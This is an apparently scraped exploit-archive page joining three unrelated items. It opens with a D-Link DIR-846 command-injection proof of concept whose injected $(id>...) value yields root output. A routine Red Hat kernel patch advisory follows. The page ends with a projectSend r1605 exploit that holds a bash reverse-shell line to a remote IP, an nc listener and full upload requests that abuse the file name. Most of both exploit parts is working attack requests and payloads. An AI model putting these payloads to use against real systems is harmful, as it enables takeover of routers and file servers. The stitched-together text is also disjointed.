http://192.168.0.1/AdvMacBindIp.html?t=1669852917775Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}```### Response```HTTP/1.1 200 OKX-Powered-By: PHP/7.1.9Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-type: text/html; charset=UTF-8Connection: closeDate: Thu, 01 Dec 2022 11:03:54 GMTServer: lighttpd/1.4.35Content-Length: 68{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}```### Data from RCE Request```GET /HNAP1/rce_confirmed HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1Upgrade-Insecure-Requests: 1```### Response```HTTP/1.1 200 OKContent-Type: application/octet-streamAccept-Ranges: bytesContent-Length: 24Connection: closeDate: Thu, 01 Dec 2022 23:24:28 GMTServer: lighttpd/1.4.35uid=0(root) gid=0(root)```

D-Link DIR-846 Remote Command Execution

Red Hat Security Advisory 2023-1659-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1659-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1659  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-4378 CVE-2023-0266 CVE-2023-0386   
                   CVE-2023-1476   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

* kpatch: mm/mremap.c: incomplete fix for CVE-2022-41222 (CVE-2023-1476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176035 - CVE-2023-1476 kpatch: mm/mremap.c: incomplete fix for CVE-2022-41222

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.src.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.src.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_10_1-debuginfo-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_10_1-debugsource-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-debuginfo-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-debugsource-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-6.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-6.el8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_10_1-debuginfo-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_10_1-debugsource-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-debuginfo-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-debugsource-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-6.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-6.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/cve/CVE-2023-1476  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2Qe9zjgjWX9erEAQhVwA/9F+geRfR34ASgwJojn/TmhjS6mIrUdsy+  
JSeDC5XeDhtilIACCC/GYS2NUApiQiIsQAQ3rlXc1CeAJVLaPoZPtIaDieg7uq9X  
LU9O0RVRUt7gJQAjtRY1zPqS6ZMkMcEnPqF2gMxnlyVaCFFvv81FkRICZsT4BjcK  
5PlbFaUm2hroSR0L5bzQD0HvA6fKR0QkjFr+n5Uq4KLp+PB7cWhXatQYzhsswu7k  
ja7LZbiVeiCzgeWzXrWaDzTygLTRo2nFzeKuxwa6YfwGKaBrL8LN1HorqWr5XLCm  
001eTo1tTQCUhT8G1Sbw+BNZN20o+XdC6naJahAeq76p3vXhHXjbKutPqUgRDpgZ  
KiMu4Wi+pBTolH/MDrRDIeUpqDL9QON9b2sd3M3ZjfQI2GU84CUJJj/Z7Bs9BQzz  
JAskb1stqTom5S5oYX24uL9mKP+2d4WMEaPM1LWzlewKpIBJXryWHryN/LJggxOo  
bN09uK27ll+mTiBL9N+Spk4FlB5ZOOx9s3kcYWqv38sqRLlNNM/UKouDoR0pQd81  
IFKymxdIek5bM7qiySBQDpz4kOiw899KPxc+iC03FOqt8sYMHVz4O0jR97mn0DDO  
rxm6CwbM7/RpoqlNTprkufFsKR3sMZx5ryxIZBhwkejLi87wWkC0miqz8xeqUXkf  
CC9zM26e1Eg=  
=qd3R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1659-01

projectSend r1605 suffers from a remote code execution vulnerability.

Exploit Title: projectSend r1605 - Remote Code Exectution RCE  
Application: projectSend  
Version: r1605  
Bugs:  rce via file extension manipulation  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 26-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC  
========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. 

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port   
 nc -lvp 4444

 3.and when uploading file it makes http request as below.file name should be like this      openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1  
Host: localhost  
Content-Length: 525  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/upload.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="name"

openme.sh;jpg  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunk"

0  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunks"

1  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="file"; filename="blob"  
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--

4.In the second request, we do this to the filename section at the bottom.

openme.sh

POST /files-edit.php?ids=34 HTTP/1.1  
Host: localhost  
Content-Length: 1016  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/files-edit.php?ids=34&type=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][id]"

34  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][name]"

openme.sh  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][description]"

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="save"

------WebKitFormBoundaryc8btjvyb3An7HcmA--

And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce

private youtube video poc : https://youtu.be/Ln7KluDfnk4

Source

Packet Storm